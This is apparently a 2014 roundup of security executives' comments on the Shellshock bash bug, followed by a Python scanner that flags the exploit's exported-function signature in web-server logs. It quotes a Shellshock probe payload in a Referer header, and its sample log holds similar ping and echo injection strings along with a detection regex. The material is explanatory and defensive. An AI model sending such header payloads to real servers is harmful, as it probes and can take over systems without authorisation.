Jason Lewis, Chief Collection and Intelligence Officer, Lookingglass Cyber Solutions:
“The original vulnerability was patched by CVE-2014-6271. Unfortunately this patch did not completely fix the problem. This means even patched systems are vulnerable.
Several proofs of concept have been released. The exploit has the ability to turn into a worm, so someone could unleash an exploit to potentially infect a huge number of hosts.”
Ron Gula, Chief Executive Officer and Chief Technical Officer, Tenable Network Security:
“Auditing systems for ShellShock will not be like scanning for Heartbleed. Heartbleed scans could be completed by anyone with network access with high accuracy. With ShellShock, the highest form of accuracy to test for this is to perform a patch audit. IT auditing shops that don’t have mature relationships with their IT administrators may not be able to audit for this.
Detecting the exploit of this is tricky. There are network IDS rules to detect the attack on unencrypted (non-SSL) web servers, but IDS rules to look for this attack over SSL or SSH won’t work. Instead, solutions which can monitor the commands run by servers and desktops can be used to identify commands which are new, anomalistic and suspect.”
Mike Spanbauer, Managing Director of Research, NSS Labs:
“Bash is an interpretive shell that makes a series of commands easy to implement on a Unix derivative. Linux is quite prevalent today throughout the Web, both as commerce platform and as commercial website platform. It happens to be the default script shell for Unix, Linux, well… you get the picture.
The core issue is that while initially the vulnerability highlights the ease with which an attacker might take over a Web server running CGI scripting, and ultimately, ‘get shell’ which offers the attacker the means to reconfigure the access environment, get to sensitive data or compromise the victim machine in many ways.
As we get to the bottom of this issue, it will certainly be revealed just how bad this particular discovery is – but there is a chance it’s bigger than Heartbleed, and that resulted in thousands of admin hours globally applying patches and fixes earlier this year.”
Contrast Security CTO and co-founder Jeff Williams:
“This is a pretty bad bug. The problem happens because bash supports a little used syntax for ‘exported functions’ – basically a way to define a function and make it available in a child shell. There’s a bug that continues to execute commands that are defined after the exported function.
So if you send an HTTP request with a referrer header that looks like this: Referer:() { :; }; ping -c 1 11.22.33.44. The exported function is defined by this crazy syntax () { :; }; And the bash interpreter will just keep executing commands after that function. In this case, it will attempt to send a ping request home, thus revealing that the server is susceptible to the attack.
Fortunately there are some mitigating factors. First, this only applies to systems that do the following things in order: 1) Accept some data from an untrusted source, like an HTTP request header, 2) Assign that data to an environment variable, 3) Execute a bash shell (either directly or through a system call).
If they send in the right data, the attacker will have achieved the holy grail of application security: ‘Remote Command Execution.’ An RCE basically means they have completely taken over the host.
Passing around data this way is a pretty bad idea, but it was the pattern back in the CGI days. Unfortunately, there are still a lot of servers that work that way. Even worse, custom applications may have been programmed this way, and they won’t be easy to scan for. So we’re going to see instances of this problem for a long long time.”
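A log-side check for the pattern Jeff Williams describes above (the "() {" exported-function prefix arriving in an HTTP header that a CGI handler exports into the environment), which is also the kind of unencrypted-traffic detection Ron Gula mentions. This is an added example, not code from the article or from any company quoted in it; the log lines, addresses and paths are constructed.

```python
"""Scan web-server access-log lines for the Shellshock exported-function
signature in header fields that CGI exports as environment variables.

Added example, not from the article or any vendor quoted in it. Sample
log lines are constructed (documentation IP ranges, made-up paths).
"""
import re
from typing import Dict, List

# Bash treats an environment value starting with "() {" as an exported
# function definition; vulnerable builds keep parsing past the closing
# brace and execute what follows. Spacing varied in the wild, so allow
# optional whitespace between "()" and "{".
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Apache/nginx "combined" format: the last two quoted fields are the
# Referer and User-Agent headers, both of which CGI turns into
# HTTP_REFERER / HTTP_USER_AGENT environment variables.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Constructed sample: one probe in the User-Agent, one benign request,
# one probe in the Referer with tighter spacing.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :; }; /bin/ping -c 1 198.51.100.9"
198.51.100.20 - - [25/Sep/2014:10:01:05 +0000] "GET /index.html HTTP/1.1" 200 2048 "http://example.test/" "Mozilla/5.0"
203.0.113.5 - - [25/Sep/2014:10:01:09 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "() { :;}; echo vulnerable" "curl/7.30"
"""


def find_shellshock_attempts(log_text: str) -> List[Dict[str, str]]:
    """Return one finding per log line whose Referer or User-Agent carries
    the exported-function prefix, recording source IP, header and value."""
    findings: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # not combined format; a real scanner would report this
        for header in ("referer", "agent"):
            value = match.group(header)
            if SHELLSHOCK_RE.search(value):
                findings.append({
                    "ip": match.group("ip"),
                    "request": match.group("request"),
                    "header": header,
                    "value": value,
                })
    return findings


if __name__ == "__main__":
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['request']} via {hit['header']}: {hit['value']}")
```

The same signature check applies to any other header a CGI gateway exports (Cookie, Host, custom headers), so a real deployment would feed it the full header set rather than only the two the combined format records.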
Tal Klein, Vice President of Strategy at Adallom:
“What I don’t like to see is people comparing Shellshock to Heartbleed. Shellshock is exponentially more dangerous because it allows remote code execution, meaning a successful attack could lead to the zombification of hosts. We’ve already seen one self-replicating Shellshock worm in the wild, and we’ve already seen one patch circumvention technique that requires patched Bash to be augmented in order to be ‘truly patched’. What I’m saying is that generally I hate people who wave the red flag about vulnerabilities, but this is a 10 out of 10 on the awful scale and poses a real threat to core infrastructure. Take it seriously.”
Michael Sutton, Vice President of Security Research at Zscaler:
“Robert Graham has called the ‘Shellshock’ vulnerability affecting bash ‘bigger than Heartbleed.’ That’s a position we could defend or refute, it all depends upon how you define bigger. Will more systems be affected? Definitely. While both bash and OpenSSL, which was impacted by Heartbleed, are extremely common, bash can be found on virtually all *nix systems, while the same can’t be said for OpenSSL as many systems simply would require SSL communication. That said, we must also consider exploitability and here is where I don’t feel that the risk posed by Shellshock will eclipse Heartbleed.
Exploiting Heartbleed was (is) trivially easy. The same simple malformed ‘heartbeat’ request would trigger data leakage on virtually any vulnerable system. This isn’t true for Shellshock as exploitation is dependent upon influencing bash environment variables. Doing so remotely will depend upon the exposed applications that interact with bash. Therefore, this won’t quite be a ‘one size fits all’ attack. Rather, the attacker will first need to probe servers to determine not only those that are vulnerable, but also how they can inject code into bash environment variables.
The difference here is that we have to take application logic into account with Shellshock and that was not required with Heartbleed. That said, we’re very much in the same boat having potentially millions of vulnerable machines, many of which will simply never be patched. Shellshock, like Heartbleed, will live on indefinitely.”
Mamoon Yunus, CEO of Forum Systems:
“The Bash vulnerability has the potential to be much worse than Heartbleed. Leaking sensitive data is obviously bad but the Bash vulnerability could lead to losing control of your entire system.
The Bash vulnerability is a prime example of why it’s critical to take a lockdown approach to open, free-for-all shell access, a practice that is all too common for on-premise and cloud-based servers. Mobile applications have caused an explosion in the number of services being built and deployed. Such services are hosted on vanilla Linux OS variants with little consideration given to security and are typically close to the corporate edge. Furthermore, a large number of vendors use open Linux OSes, install their proprietary functionality, and package commercial network devices that live close to the network edge at Tier 0. They do so with full shell access instead of building a locked-down CLI for configuration.
The Bash vulnerability is a wake-up call for corporations that continue to deploy business functionality at the edge without protecting their services and API with hardened devices that do not provide a shell-prompt for unfettered access to OS internals for anyone to exploit.”
Jody Brazil, CEO of FireMon:
“This is the kind of vulnerability that can be exploited by an external attacker with malicious intent. So, how do those from the Internet, partner networks or other outside connection gain access to this type of exposure?
An attack vector analysis that considers network access through firewalls and address translation can help identify which systems are truly exposed. Then, determine if it’s possible to mitigate the risk by blocking access, even temporarily. In those cases where this is not an option, prioritizing patching is essential. In other cases where, for example, there is remote access to a vulnerable system that is not business-critical, access can be denied using existing firewalls.
This helps security organizations focus their immediate patching efforts and maximize staffing resources. It’s critical to identify the greatest risk and then prioritize remediation activities accordingly. Those are key best practices to address Bash or any vulnerability of this nature.”
Mark Stanislav, Security Researcher at Duo Security:
“While Heartbleed eventually became an easy vulnerability to exploit, it was ultimately time consuming, unreliable and rarely resulted in ‘useful’ data output. Shell Shock, however, effectively gives an attacker remote code execution on any impacted host with a much easier means to exploit than Heartbleed and greater potential results for criminals.
Once a web application or similarly afflicted application is found to be vulnerable, an attacker can do anything from download software, to read/write system files, to escalating privilege on the host or across internal networks. More damning, of course, is that the original patch to this issue seems to be flawed and now it’s a race to get a better patch released and deployed before attackers leverage this critical bug.”
Rob Sadowski, Director of Technology Solutions at RSA:
“This is a very challenging vulnerability to manage because the scope of potentially affected systems is very large, and can be exploited in a wide variety of forms across multiple attack surfaces. Further, there is no single obvious signature to help comprehensively detect attempts to exploit the vulnerability, as there are so many apps that access BASH in many different ways.
Because many organizations had to recently manage a vulnerability with similar broad scope in Heartbleed, they may have improved their processes to rapidly identify and remediate affected systems which they can leverage in their efforts here.”
Joe Barrett, Senior Security Consultant, Foreground Security:
“Right now, Shellshock is making people drop everything and scramble to fix patches. Security experts are still expanding the scope of vulnerability, finding more devices and more methods in which this vulnerability can be exploited. But no one has gotten hacked and been able to turn around and point and say ‘It was because of shellshock’ that I’ve seen.
If you have a Linux box, patch it. Now. Do you have a Windows box using Cygwin? Update Cygwin to patch it. And then start trying to categorize all of the ‘other’ devices on the network and determining if they might be vulnerable. Because chances are a lot of them are.
Unfortunately, vendors probably will never release patches to solve this for most appliances, because most [Internet-connected] appliances don’t even provide a way to apply such an update. But for the most part all you can do is try to identify affected boxes and move them behind firewalls and out of the way of anyone’s ability to reach them. Realistically, we’ll probably still be exploiting this bug in penetration tests in 8 years. Not to mention all of the actual bad guys who will be exploiting this.”
Until Next Friday…Have a Great Weekend!
Related Reading: What We Know About Shellshock So Far, and Why the Bash Bug Matters